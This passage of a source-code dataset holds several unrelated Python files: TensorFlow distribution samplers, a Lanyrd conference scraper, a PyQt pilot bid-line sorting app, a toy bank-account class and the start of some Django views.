tf.constant(value=lower, dtype=tf.float32) # no reshape needed\n upper = tf.constant(value=upper, dtype=tf.float32)\n return lower, upper\n\n\n@tf.function\ndef iterative_sb_and_jac(κ):\n batch_size, max_size, samples_n = κ.shape\n ς = 1.e-20\n η = tf.TensorArray(dtype=tf.float32, size=max_size, element_shape=(batch_size, samples_n),\n clear_after_read=True)\n η = η.write(index=0, value=κ[:, 0, :])\n cumsum = tf.identity(κ[:, 0, :])\n next_cumsum = tf.identity(κ[:, 1, :] * (1 - κ[:, 0, :]) + κ[:, 0, :])\n jac_sum = tf.constant(value=0., dtype=tf.float32, shape=(batch_size, samples_n))\n max_iter = tf.constant(value=max_size - 1, dtype=tf.int32)\n for i in tf.range(1, max_iter):\n η = η.write(index=i, value=κ[:, i, :] * (1. - cumsum))\n jac_sum += tf.math.log(1. - cumsum + ς)\n cumsum += κ[:, i, :] * (1. - cumsum)\n next_cumsum += κ[:, i + 1, :] * (1. - next_cumsum)\n\n η = η.write(index=max_size - 1, value=κ[:, max_size - 1, :] * (1. - cumsum))\n jac_sum += tf.math.log(1. - cumsum + ς)\n return tf.transpose(η.stack(), perm=[1, 0, 2]), -jac_sum\n\n\n@tf.function\ndef compute_log_jac(κ):\n batch_size, n_required, samples_n = κ.shape\n cumsum = tf.identity(κ[:, 0, :])\n jac_sum = tf.constant(value=0., dtype=tf.float32, shape=(batch_size, samples_n))\n max_iter = tf.constant(value=n_required, dtype=tf.int32)\n for i in tf.range(1, max_iter):\n jac_sum += tf.math.log(1. - cumsum + 1.e-20)\n cumsum += κ[:, i, :] * (1. - cumsum)\n return -jac_sum\n\n\ndef generate_sample(sample_size: int, params, dist_type: str, temp, threshold: float = 0.99,\n output_one_hot=False):\n chosen_dist = select_chosen_distribution(dist_type=dist_type, threshold=threshold,\n params=params, temp=temp, sample_size=sample_size)\n categories_n = params[0].shape[1]\n chosen_dist.do_reparameterization_trick()\n if output_one_hot:\n vector = np.zeros(shape=(1, categories_n, sample_size, 1))\n n_required = chosen_dist.psi.shape[1]\n vector[:, :n_required, :, :] = chosen_dist.psi.numpy()\n return vector\n else:\n sample = np.argmax(chosen_dist.psi.numpy(), axis=1)\n return sample\n\n\ndef select_chosen_distribution(dist_type: str, params, temp=tf.constant(0.1, dtype=tf.float32),\n sample_size: int = 1, threshold: float = 0.99, run_iteratively=False):\n if dist_type == 'logit':\n # noinspection PyTypeChecker\n mu, xi = params\n chosen_dist = LogitDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size, threshold=threshold)\n elif dist_type == 'ExpGS':\n pi = params[0]\n chosen_dist = ExpGSDist(log_pi=pi, temp=temp, sample_size=sample_size)\n elif dist_type == 'IsoGauSoftMax':\n mu = params[0]\n chosen_dist = IsoGauSoftMax(mu=mu, temp=temp, sample_size=sample_size)\n elif dist_type == 'GauSoftMax':\n mu, xi, = params\n chosen_dist = GaussianSoftmaxDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size)\n elif dist_type == 'GauSoftPlus':\n mu, xi, = params\n chosen_dist = GaussianSoftPlus(mu=mu, xi=xi, temp=temp, sample_size=sample_size)\n elif dist_type == 'Cauchy':\n mu, xi, = params\n chosen_dist = CauchySoftmaxDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size)\n elif dist_type == 'sb':\n # noinspection PyTypeChecker\n mu, xi = params\n chosen_dist = SBDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size, threshold=threshold)\n if run_iteratively:\n chosen_dist.run_iteratively = True\n else:\n raise RuntimeError\n\n return chosen_dist\n\n\ndef generate_samples_mp(total_samples, params, dist_type, threshold, temp, pool, output_one_hot=False):\n # TODO: correct this function\n func = partial(generate_sample, params=params, 
threshold=threshold,\n dist_type=dist_type, temp=temp, output_one_hot=output_one_hot)\n # noinspection PyTypeChecker\n sb_samples = np.array(pool.map(func=func, iterable=[b for b in range(total_samples)]))\n\n return sb_samples\n# ===========================================================================================================\n","sub_path":"Utils/Distributions.py","file_name":"Distributions.py","file_ext":"py","file_size_in_byte":26269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342145010","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport csv\nfrom serializers import Conference\nfrom datetime import datetime\nimport re\nimport urllib\n\n__author__ = 'lorenamesa'\n\nLANYARD_URL = 'http://lanyrd.com'\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, os.pardir))\n\ndef main(args):\n\n calls_q = \"+\".join(word for word in args.get('calls'))\n\n response = requests.get(LANYARD_URL + '/calls/?q={0}'.format(calls_q))\n soup = BeautifulSoup(response.content)\n\n cfps = soup.find_all('li', class_='call-item call-list-open')\n\n conferences = {}\n\n for cfp in cfps:\n links = cfp.find_all('a')\n call_closes_indx = cfp.get_text().find('Call closes on')\n call_closes = cfp.get_text()[call_closes_indx:]\n data = {'name': links[1].get_text().encode('utf-8'),\n 'url': cfp.find_all('a')[1].attrs.get('href'),\n 'cfp': True,\n 'cfp_url': cfp.find_all('a')[0].attrs.get('href'),\n 'cfp_deadline': call_closes,\n 'location': cfp.find_all('a')[2].get_text() + ' ' + cfp.find_all('a')[3].get_text()}\n\n\n conferences[links[1].get_text()] = Conference(**data)\n\n topics_q = \"+\".join(word for word in args.get('topic'))\n\n response = requests.get(LANYARD_URL + '/topics/{0}/'.format(topics_q))\n soup = BeautifulSoup(response.content)\n\n upcoming_conf = soup.find_all('a', class_='summary url')\n\n for conf in upcoming_conf:\n data = {'name': conf.get_text().encode('utf-8'),\n 'url': LANYARD_URL + conf.attrs.get('href'),\n 'cfp': False}\n if data.get('name') not in conferences.keys():\n conferences[data.get('name')] = Conference(**data)\n\n for conf_name, conference in conferences.iteritems():\n lanyard_url = conference.url\n response = requests.get(lanyard_url)\n soup = BeautifulSoup(response.content)\n conf_url = soup.find('a', class_='icon url website')\n conference.url = conf_url.attrs.get('href')\n\n if soup.find('p', class_='date main-date date-range-day'):\n datestr = soup.find('p', class_='date main-date date-range-day').contents[1].attrs.get('title')\n else:\n datestr = soup.find('abbr', class_='dtstart').attrs.get('title')\n\n try:\n datestr = datetime.strptime(datestr, \"%B %d, %Y\")\n except ValueError as e:\n datestr = datetime.strptime(datestr, \"%b. 
%d, %Y\")\n\n conference.date = datestr\n\n if not conference.location:\n location = soup.find('p', class_='prominent-place').get_text()\n cleaned_location = re.sub(r'\\s+', ' ', location).encode('utf-8')\n conference.location = cleaned_location\n\n sorted_conferences = sorted(conferences.values(), key=lambda c: c.date)\n\n for conf in sorted_conferences:\n conf.date = conf.date.strftime(\"%m/%d/%y\")\n\n with open('{0}/data/conferences.csv'.format(ROOT_DIR), 'w') as list_conferences:\n headers = 'date,name,location,url,cfp,cfp_url,cfp_deadline,fa,fa_url,fa_deadline'.split(',')\n\n writer = csv.DictWriter(list_conferences, fieldnames=headers)\n writer.writeheader()\n\n for conf in sorted_conferences:\n writer.writerow(conf.__dict__)\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"build/lib/digest/conferences.py","file_name":"conferences.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"118094867","text":"#!/usr/bin/env python\n#\n#####################################################################\n# Copyright Shawn Downey #\n# 2016 #\n#####################################################################\n#\nimport re, codecs, sys, time, calendar\nfrom datetime import datetime\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDialog\n# custom imports\nfrom bidgui import Ui_mainWindow, Ui_downloadDialog, Ui_resultsWindow\nimport download, messages, hashlib\nfrom os.path import abspath, exists, dirname\nfrom inspect import getsourcefile\n\n\n# from tkinter import *\n\n# ---gui-Classes\n\n# main window class\nclass mainWindow(QMainWindow, Ui_mainWindow):\n def __init__(self, nextmonth):\n QMainWindow.__init__(self)\n self.setupUi(self)\n self.nextmonth = nextmonth\n self.monthBox.setCurrentIndex(nextmonth)\n self.downloadButton.clicked.connect(self.downloadShowDialog)\n self.lineButton.clicked.connect(self.viewLine)\n self.seqButton.clicked.connect(self.viewSeq)\n self.sortButton.clicked.connect(self.sortLines)\n self.actionHelp.triggered.connect(lambda: messages.showMessage('Help', 0, 'Read the README included in the MasterBidder folder.'))\n self.actionAbout.triggered.connect(lambda: messages.showMessage('About', 0, 'MasterBidder\\n\\nVersion 0.1 (alpha)\\n\\nAll code and design work done by S. 
Dizzle.\\n\\n©2016'))\n self.action_Save_Results.triggered.connect(lambda: self.saveResults(self.results))\n self.action_Exit.triggered.connect(lambda: self.close())\n self.sortedmonth = None\n self.lines = None\n self.numoflines = 0\n self.seqs = None\n self.results = None\n self.sortProg.hide()\n #TODO: program prog bar\n\n def downloadShowDialog(self):\n base = self.baseBox.currentText()\n equip = self.equipBox.currentText()\n self.download = downloadDialog(base, equip)\n self.download.show()\n self.download.raise_()\n self.month = self.nextmonth + 1 # due to box index starting with 0\n self.month = calendar.month_abbr[self.month].upper()\n print('Preparing to download the latest', base, equip, 'bid packet.')\n\n def sortLines(self):\n month = self.monthBox.currentText()\n days = self.daysBox.value()\n credit = self.creditBox.value()\n start = self.startBox.value()\n end = self.endBox.value()\n carry = self.carryBox.isChecked()\n reserve = self.reserveBox.isChecked()\n daylist = ['MO', 'TU', 'WE', 'TH', 'FR', 'SA', 'SU']\n daysoff = []\n checkboxes = [self.moBox.isChecked(), self.tuBox.isChecked(), self.weBox.isChecked(), self.thBox.isChecked(),\n self.frBox.isChecked(), self.saBox.isChecked(), self.suBox.isChecked()]\n\n for i, n in enumerate(checkboxes):\n if n == False:\n daysoff.append(daylist[i])\n\n\n if self.lines and (self.sortedmonth == month):\n self.results = SortLines(month, days, credit, start, end, carry, reserve, daysoff, self.lines,\n self.numoflines, self.seqs)\n else:\n\n (self.lines, self.numoflines, self.seqs) = DeconstructLines(month,self)\n #TODO: add error catch\n self.results = SortLines(month, days, credit, start, end, carry, reserve, daysoff, self.lines,\n self.numoflines, self.seqs)\n self.sortedmonth = month\n\n self.newWin = resultsWindow(self.results)\n self.newWin.showMaximized()\n\n def viewLine(self):\n line = self.lineBox.value()\n month = self.monthBox.currentText()\n results = ViewLines(line, month,self.lines,self.numoflines,self)\n self.newWin = resultsWindow(results)\n self.newWin.showMaximized()\n\n def viewSeq(self):\n seq = str(self.seqBox.value())\n month = self.monthBox.currentText()\n results = ViewSequence(seq, month,self.seqs,self)\n self.newWin = resultsWindow(results)\n self.newWin.showMaximized()\n\n def saveResults(self,results):\n if self.sortedmonth and results:\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n resultspath = directory + self.sortedmonth + 'results.txt'\n with codecs.open(resultspath, \"w\", \"utf-8\") as resultsdump:\n resultsdump.write(results)\n resultsdump.close()\n messagestr = 'The results have been saved to ' + self.sortedmonth + 'results.txt'\n messages.showMessage('Results Saved!', 1, messagestr)\n else:\n messages.showMessage('Results error!', 2, 'There was a problem saving the results. 
Are you sure you sorted the packet?')\n\n def updateProgress(self):\n value = self.sortProg.value()\n value = value + 10\n self.sortProg.setValue(value)\n QApplication.processEvents()\n\n# download dialog class\nclass downloadDialog(QDialog, Ui_downloadDialog):\n def __init__(self, base, equip):\n QDialog.__init__(self)\n self.setupUi(self)\n self.base = base\n self.equip = equip\n self.downloadButton.clicked.connect(lambda: self.download(base, equip))\n\n def download(self, base, equip):\n self.downloadButton.setDisabled(True)\n user = self.loginID.text()\n passwrd = self.loginPass.text()\n\n self.updateProgress('...loading web request')\n\n response = download.logIn(user, passwrd, base, equip, self)\n\n if response:\n if response == 'error':\n messages.showMessage('Unexpected error.', 2, 'An unexpected error occurred.\\n\\nTry again.')\n elif response == 'login':\n messages.showMessage('Login incorrect.',2,'You have entered the wrong login credentials.\\n\\nTry again.')\n else:\n response = response.text\n header = response[0:25]\n print(response)\n month = ['JANUARY', 'FEBRUARY', 'MARCH', 'APRIL', 'MAY', 'JUNE', 'JULY', 'AUGUST', 'SEPTEMBER',\n 'OCTOBER',\n 'NOVEMBER', 'DECEMBER']\n for x, y in enumerate(month):\n answer = header.find(y)\n if answer > -1:\n answer = y\n break\n month = answer\n answer = answer[0:3]\n answer = ''.join(answer)\n answer = answer.upper()\n print(answer)\n\n self.updateProgress('writing bid data to file...')\n\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n bidpath = directory + answer + \".txt\"\n with codecs.open(bidpath, \"w\", \"utf-8\") as bidfile:\n bidfile.write(response)\n bidfile.close()\n self.updateProgress('file saved...')\n stringthing = 'The %s bid packet was successfully downloaded!' % (month + ' ' + base + ' ' + equip)\n messages.showMessage('Success!', 1, stringthing)\n\n self.downloadButton.setEnabled(True)\n self.close()\n\n def updateProgress(self, status):\n value = self.progressBar.value()\n value = value + 10\n self.progressBar.setValue(value)\n self.downloadStatus.setText(status)\n QApplication.processEvents()\n\n\nclass resultsWindow(QDialog, Ui_resultsWindow):\n def __init__(self, results):\n QDialog.__init__(self)\n self.setupUi(self)\n self.results = results\n self.resultsView.setText(results)\n\n\n# Maybe this will have some function in the future\nclass Packet(object):\n def __init__(self, bidmonth, lines):\n self.bidmonth = bidmonth\n self.lines = lines\n\n\n# Class-ifys line information for attribute lookups\nclass Line(Packet):\n def __init__(self, linenumber, blkvalue, crdvalue, daysoff, tafb, carryover, seqinfo, seqnums, seqstarts, seqends,\n lineinfo):\n self.linenumber = linenumber\n self.blkvalue = blkvalue\n self.crdvalue = crdvalue\n self.daysoff = daysoff\n self.tafb = tafb\n self.carryover = carryover\n self.seqinfo = seqinfo\n self.seqnums = seqnums\n self.seqstarts = seqstarts\n self.seqends = seqends\n self.lineinfo = lineinfo\n\n\nclass Seq(Packet):\n def __init__(self, seqnum, seqdays, seq):\n self.seqnum = seqnum\n self.seqdays = seqdays\n self.seq = seq\n\n\n# Does all the prep work\ndef DeconstructLines(bidmonth,window):\n window.sortProg.setValue(0)\n window.sortProg.show()\n timebefore = time.time()\n # constructs bidpaths\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n bidpath = directory + bidmonth + \".txt\"\n xpath = directory + bidmonth + \"x.txt\" # fixed bid packet\n ypath = directory + bidmonth + \"y.txt\" # sequence file\n zpath = directory + bidmonth + \"z.txt\" # 
line file\n delimeter = \"-------------------------------------------------------------------------------------------------------------------------------------\\n\"\n # prints bidpath to the console\n print(\"The bid file should be located at: \" + bidpath)\n window.updateProgress() #1\n # see if bidpath exists, then open using Windows codec and re-write as UTF text\n if exists(bidpath):\n with codecs.open(bidpath, \"r\", \"cp1250\") as bidfile:\n with codecs.open(xpath, \"w\", \"utf-8\") as xfile:\n for line in bidfile:\n if not '------------------------' in line: #issue: sometimes found in sequences\n xfile.write(line)\n else:\n xfile.write(delimeter)\n xfile.close()\n bidfile.close()\n # open new UTF bid file and read the contents\n window.updateProgress() #2\n with codecs.open(xpath, \"r\", encoding='utf-8', errors='ignore') as xfile:\n bidcontent = xfile.read()\n # find the lines\n #TODO: FIX\n seqgrabber = delimeter + '.*' + delimeter\n results = re.search(seqgrabber, bidcontent, re.DOTALL)\n results = results.group(0)\n # turns results back to string after stripping extraneous text\n # cleans up text for processing & removes more extraneous:\n results = re.sub(r'\\S\\S\\S\\s*PILOT\\s*LINES\\s*DOMICILE:\\s*\\S\\S\\S','',results)\n results = re.sub(r'^\\s*$','',results)\n\n xfile.close()\n # print(results) # remove for debugging\n\n # creates new data file for processing\n window.updateProgress() #3\n with codecs.open(zpath, \"w\", encoding='utf-8') as zfile:\n zfile.write(results)\n zfile.write(delimeter)\n zfile.close()\n\n window.updateProgress() #4\n\n with codecs.open(zpath, \"r\", encoding='utf-8') as zfile:\n contents = zfile.read()\n linenumber = re.findall('BLK NO. (\\d\\d\\d) ', contents, re.DOTALL)\n blkvalue = re.findall('BLK. +(\\d+.\\d\\d)', contents, re.DOTALL)\n crdvalue = re.findall('CRD. 
(\\d\\d.\\d\\d)', contents, re.DOTALL)\n daysoff = re.findall('DYS OFF +(\\d+)', contents, re.DOTALL)\n tafb = re.findall('TAFB +(\\d+.\\d\\d)', contents, re.DOTALL)\n carryover = re.findall('C/O +(\\d+.\\d\\d)', contents, re.DOTALL)\n seqreg = r'(?=' + delimeter + r'(.*?)' + delimeter + ')'\n lineinfo = re.findall(seqreg, contents, re.DOTALL) # gathers each individual line for processing\n\n\n # removes formatting error blank lines\n for i in lineinfo:\n if 'BLK' not in str(i):\n lineinfo.remove(i)\n\n # processes the sequences and groups them according to each bid line\n\n seqinfo = []\n x = len(lineinfo)\n for y in range(0, x):\n seqstuff = re.findall('(\\d\\d\\d)= (\\d\\d\\d\\d)/(\\d\\d\\d\\d)/\\d\\d\\d\\d', str(lineinfo[y]), re.DOTALL)\n seqinfo.append(seqstuff)\n\n listed = [linenumber, blkvalue, crdvalue, daysoff, tafb, carryover, seqinfo]\n linenums = listed[0]\n linenums = [int(i) for i in linenums]\n blkvals = listed[1]\n blkvals = [float(i) for i in blkvals]\n crdvals = listed[2]\n crdvals = [float(i) for i in crdvals]\n offs = listed[3]\n offs = [int(i) for i in offs]\n aways = listed[4]\n aways = [float(i) for i in aways]\n overs = listed[5]\n overs = [float(i) for i in overs]\n seqinfs = listed[6]\n # turns all seq data into an integer so it can be compared later\n seqinfs = [[[int(j) for j in i] for i in h] for h in seqinfs]\n seqnums = [[[x for ind, x in enumerate(y) if ind == 0] for y in z] for z in seqinfs]\n seqnums = [[x.pop() for x in y] for y in seqnums]\n # turn seqnums back to string so they can be compared to seqnums in Seq object later\n seqnums = [[str(i) for i in n] for n in seqnums]\n seqstarts = [[[x for ind, x in enumerate(y) if ind == 1] for y in z] for z in seqinfs]\n seqstarts = [[x.pop() for x in y] for y in seqstarts]\n seqends = [[[x for ind, x in enumerate(y) if ind == 2] for y in z] for z in seqinfs]\n seqends = [[x.pop() for x in y] for y in seqends]\n\n\n #print all the data\n print(len(linenums), 'lines', linenums)\n print(len(blkvals), 'blk vals', blkvals)\n print(len(crdvals), 'crd vals', crdvals)\n print(len(offs), 'days off', offs)\n print(len(aways), 'tafb', aways)\n print(len(overs), 'carrys', overs)\n print(len(seqinfs), 'seqinfo', seqinfs)\n print(len(seqnums),'seqnums', seqnums)\n print(len(seqstarts),'seqstarts', seqstarts)\n print(len(seqends), 'seqends', seqends)\n\n\n window.updateProgress() #5\n # Stuff line data into list of Line classes for reference by attributes\n lines = []\n i = len(linenums)\n for n in range(0, i):\n lines.append(\n Line(linenums[n], blkvals[n], crdvals[n], offs[n], aways[n], overs[n], seqinfs[n], seqnums[n],\n seqstarts[n], seqends[n], lineinfo[n]))\n\n packet = Packet(bidmonth, lines)\n numoflines = len(lines)\n zfile.close()\n\n with codecs.open(xpath, \"r\", encoding='utf-8', errors='ignore') as xfile:\n seqcontent = xfile.read()\n xfile.close()\n\n window.updateProgress() #6\n\n with codecs.open(ypath, \"w\", \"utf-8\", errors='ignore') as yfile:\n yfile.write(seqcontent)\n yfile.close()\n\n window.updateProgress() #7\n\n with codecs.open(ypath, \"r\", encoding='utf-8', errors='ignore') as yfile:\n seqcontent = yfile.read()\n results = re.findall('\\d\\d\\d\\d - \\S\\S\\S (.*)',\n seqcontent, re.DOTALL)\n results = '\\r'.join(results)\n # turns results back to string after stripping extraneous text\n seqdelimeter = '========================================================================'\n header = r'DAY DH FLTN DPS-ARS DEPL ARRL BLKT GRNT EQP TBLK TCRD TPAY DUTY LAYO'\n results = re.sub(r'\\w+ PILOTS 
PAIRINGS \\w+ \\d+ - \\w+ \\d+, \\d+ - \\w+', '', results)\n results = re.sub(header, '', results)\n results = re.sub(r'^\\s*$', '', results, flags=re.MULTILINE)\n results = re.sub(seqdelimeter, '', results)\n\n window.updateProgress() # 8\n\n with codecs.open(ypath, \"w\", encoding='utf-8') as yfile:\n yfile.write(results)\n yfile.close()\n\n\n # find, split, and store the sequence information\n seqreg = r'(\\d\\d\\d\\d\\d.*?LDGS:\\s+\\d+)'\n seq = re.findall(seqreg, results, flags=re.DOTALL)\n\n # find seqnum\n seqnums = []\n for x in seq:\n seqnum = re.findall(r'\\d\\d(\\d\\d\\d)', x)\n seqnum = seqnum[0]\n seqnums.append(seqnum)\n\n # find seq days worked\n seqdays = []\n for x in seq:\n seqdayfinder = re.findall(r'(\\bMO\\b|\\bTU\\b|\\bWE\\b|\\bTH\\b|\\bFR\\b|\\bSA\\b|\\bSU\\b){1}', x)\n seqdays.append(seqdayfinder)\n\n # when seqdays are found they can be returned duplicated, this sends to a function to remove dups\n for i, n in enumerate(seqdays):\n seqdays[i] = removedups(seqdays[i])\n\n window.updateProgress() #9\n # Stuff sequence data into list of Seq classes for reference by attributes\n seqs = []\n i = len(seq)\n for n in range(0, i):\n seqs.append(Seq(seqnums[n], seqdays[n], seq[n]))\n\n timeafter = time.time()\n timetodo = str(timeafter - timebefore)\n print(\"The lines took: \" + timetodo + \" seconds to organize. \\n\\n\")\n window.updateProgress() #10\n window.sortProg.hide()\n return lines, numoflines, seqs\n else:\n print(bidmonth, 'packet does not exist!')\n window.sortProg.setValue(0)\n window.sortProg.hide()\n return None, 0, None\n # returns lines & number of lines for function use\n\n\ndef SortLines(month, numofdays, amtofval, startcom, endcom, carry, reserve, daysoff, lines, numoflines, seqs):\n\n if numoflines == 0:\n return \"No lines found! 
\\nDoes the %s bid packet exist?\\n \\nIf so, there is a formatting error preventing MasterBidder from sorting the lines!\\n\" % month\n\n else:\n\n print('Searching through', numoflines, 'lines...')\n\n # create list for results\n answer = []\n delete = []\n final = []\n # iterate over the lines to find the answer\n\n\n # find days off desired\n for x in range(0, numoflines):\n if (lines[x].daysoff >= numofdays):\n answer.append(lines[x])\n stat_off = len(answer)\n\n # find credit value desired\n for y, x in enumerate(answer):\n z = getattr(x, 'crdvalue')\n if z < amtofval:\n delete.append(x)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n\n delete = []\n stat_val = len(answer)\n\n # find sequence start times desired\n for y, x in enumerate(answer):\n z = getattr(x, 'seqstarts')\n for i in z:\n if i < startcom:\n delete.append(x)\n break\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n\n delete = []\n stat_start = len(answer)\n\n # find sequence end times desired\n for y, x in enumerate(answer):\n z = getattr(x, 'seqends')\n for i in z:\n if i > endcom:\n delete.append(x)\n break\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_end = len(answer)\n\n delete = []\n\n # allow or disallow carryover\n\n if carry == False:\n for y, x in enumerate(answer):\n z = getattr(x, 'carryover')\n if z > 0:\n delete.append(x)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_carry = len(answer)\n\n delete = []\n\n if reserve == False:\n for y, x in enumerate(answer):\n z = getattr(x, 'seqnums')\n if z == []:\n delete.append(x)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_reserve = len(answer)\n\n for y, linesleft in enumerate(answer):\n groupSeqs = getattr(linesleft, 'seqnums')\n for n, currentSeq in enumerate(groupSeqs):\n for a, b in enumerate(seqs):\n if b.seqnum == currentSeq:\n for i in daysoff:\n if i in b.seqdays:\n delete.append(linesleft)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_days = len(answer)\n # if day off is found in list of days, append 'x' to 'delete'\n\n\n # print results\n\n\n printer=[]\n for i in answer:\n printer.append(i.linenumber)\n\n print(printer,'\\n')\n\n for i in answer:\n print('Line Number :', i.linenumber)\n print('Days Off :', i.daysoff)\n print('Credit Value :' , i.crdvalue)\n print('Sequences :', i.seqnums)\n print('Start Times :', i.seqstarts)\n print('End Times :', i.seqends)\n print('Carry Over :', i.carryover)\n print(i.lineinfo)\n print('\\n')\n\n stat_off = str(stat_off) + ' lines have at least ' + str(numofdays) + ' days off. 
'\n stat_val = str(stat_val) + ' lines also are worth at least ' + str(amtofval) + ' hours.'\n stat_start = str(stat_start) + ' lines also start after ' + str(startcom)\n stat_end = str(stat_end) + ' lines also end before ' + str(endcom)\n stat_carry = str(stat_carry) + ' lines also meet the carry over criteria: ' + str(carry)\n stat_reserve = str(stat_reserve) + ' lines also meet the reserve criteria: ' + str(reserve)\n stat_days = str(stat_days) + ' lines also meet the days off criteria: ' + str(daysoff)\n\n stat_block = []\n results = []\n stats = [stat_off,stat_val,stat_start,stat_end,stat_carry,stat_reserve,stat_days]\n\n for i in stats:\n stat_block.append(i)\n\n for i in answer:\n results.append(i.lineinfo)\n delimeter = '\\n----------------------------------------------------------------------------------------------------------\\n'\n results = delimeter.join(results )\n stats_block = '\\n'.join(stat_block)\n results = stats_block + delimeter + results\n if results == \"\":\n results = \"No lines found that match your criteria!\\n\\nChange your parameters and try again.\"\n\n return results\n\n\ndef ViewLines(line, month, lines, numoflines,window):\n\n if numoflines == 0:\n window.sortProg.setValue(0)\n window.sortProg.hide()\n return \"No lines found! \\nDid you sort the lines yet?\\n \\nDoes the bid packet exist?\\n\"\n\n responses = []\n for x, y in enumerate(lines):\n z = getattr(y, 'linenumber')\n if line == z:\n responses.append(y.lineinfo)\n if responses == []:\n responses = \"Did not find any matches.\"\n else:\n responses = ''.join(responses)\n return responses\n\n\ndef ViewSequence(seq, month,seqs,window):\n\n if seqs == [] or seqs == None:\n window.sortProg.setValue(0)\n window.sortProg.hide()\n return \"No sequences found! \\nDid you sort the lines yet?\\n \\nDoes the bid packet exist?\\n\"\n\n responses = []\n for x, y in enumerate(seqs):\n z = getattr(y, 'seqnum')\n if seq == z:\n responses.append(y.seq)\n if responses == []:\n responses = \"Did not find any matches.\"\n else:\n responses = ''.join(responses)\n return responses\n\n\n# for removing duplicate entries in lists\ndef removedups(input):\n output = []\n for x in input:\n if x not in output:\n output.append(x)\n return output\n\n\n# for returning integer for yes/no\ndef integermaker(input):\n if input == 'y':\n output = int(1)\n elif input == 'n':\n output = int(0)\n else:\n sys.exit()\n return output\n\n\nif __name__ == '__main__':\n currentmonth = datetime.now()\n currentmonth = currentmonth.month\n print(currentmonth)\n secretcode = 'envoysux' + str(currentmonth)\n secretcode = str.encode(secretcode)\n secretcode = hashlib.sha256(secretcode).hexdigest()\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n keyloc = directory + 'key.txt'\n print(keyloc)\n\n\n\n\n\n # GUI BUILDING\n app = QApplication(sys.argv)\n if currentmonth == 12:\n currentmonth = 0\n main = mainWindow(currentmonth)\n main.show()\n\n '''\n if exists(keyloc):\n with codecs.open(keyloc, \"r\", \"utf-8\") as keyfile:\n key = keyfile.readline().strip()\n keyfile.close()\n if key == secretcode:\n print('key valid!')\n else:\n messages.showMessage('Key required!', 3,\n 'You need a product key to use this app!\\n\\nThe keyfile was found, but the key is incorrect.')\n sys.exit()\n else:\n messages.showMessage('Key required!',3,'You need a product key to use this app!\\n\\nCould not find keyfile.')\n sys.exit()\n '''\n\n\n 
sys.exit(app.exec_())\n","sub_path":"bid.py","file_name":"bid.py","file_ext":"py","file_size_in_byte":25770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393942695","text":"import sys\n\nclass bank:\n\tAccount_no=0\n\tremaining_amount=0\n\tdef __init__(self,initial_amount):\n\t\tbank.Account_no=bank.Account_no+1\n\t\tprint(\"Account no is:{}\".format(bank.Account_no))\n\t\t\n\t\tself.initial_amount=initial_amount\n\t\tprint(\"Initial Amount is:{}\".format(self.initial_amount))\t\n\n\tdef Withdraw(self,initial_amount,withdraw_amount):\n\t\t\n\t\tif(withdraw_amount < initial_amount):\n\t\n\t\t\tbank.remaining_amount=(initial_amount - withdraw_amount)\n\t\t\treturn bank.remaining_amount\n\n\t\telse:\n\t\t\tprint(\"Balance is low..!\")\n\t\n\tdef Deposit(self,deposit_amount):\n\t\t\n\t\treturn (bank.remaining_amount+deposit_amount)\n\t\t\n\tdef Check_Balance():\n\t\treturn bank.remaining_amount\n\ndef main():\n\n\twhile True:\n\n\t\tprint(\"1.Create Account.\")\n\t\tprint(\"2.Withdraw.\")\n\t\tprint(\"3.Deposit.\")\n\t\tprint(\"4.Check Balance.\")\n\t\tprint(\"0.Exit.\")\n\n\n\t\tch=int(input(\"Enter the choice:\")) # int() rather than eval(): eval on raw user input is unsafe\n\n\t\tif ch==1:\n\t\t\tb=bank(10000)\n\t\t\tprint(\"\\n\")\n\t\telif ch==2:\n\t\t\tc=b.Withdraw(10000,5000)\n\t\t\tprint(\"\\nRemaining amount after withdrawal is {}\".format(c))\n\t\n\t\telif ch==3:\n\t\t\ttotal=b.Deposit(3000)\n\t\t\tprint(\"\\nTotal Amount is :{}\".format(total))\n\t\n\t\telif ch==4:\n\t\t\tamount=bank.Check_Balance()\n\t\t\tprint(\"\\n Amount is:{}\".format(amount))\n\n\t\telif ch==0:\n\t\t\tsys.exit()\nif __name__=='__main__':\n\tmain()\n","sub_path":"oops/Bank_account.py","file_name":"Bank_account.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190736482","text":"from django.shortcuts import render, get_object_or_404\r\nfrom django.views.generic import TemplateView, ListView, DetailView\r\nfrom staff.models import *\r\nfrom .forms import *\r\nfrom django.shortcuts import redirect\r\nfrom django.utils import timezone\r\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger # 6.2 Soi - pagination\r\nfrom ipaddr import client_ip # 6.4 Soi - IP view count\r\n\r\n\r\n# Donation organization list\r\n# 7.18 Soi - changed\r\nclass DonationLV(ListView):\r\n model = DonationOrg\r\n template_name = \"staff/donationOrg.html\"\r\n context_object_name = 'donations'\r\n donations = DonationOrg.objects.all()\r\n\r\n\r\n# Notice list\r\nclass 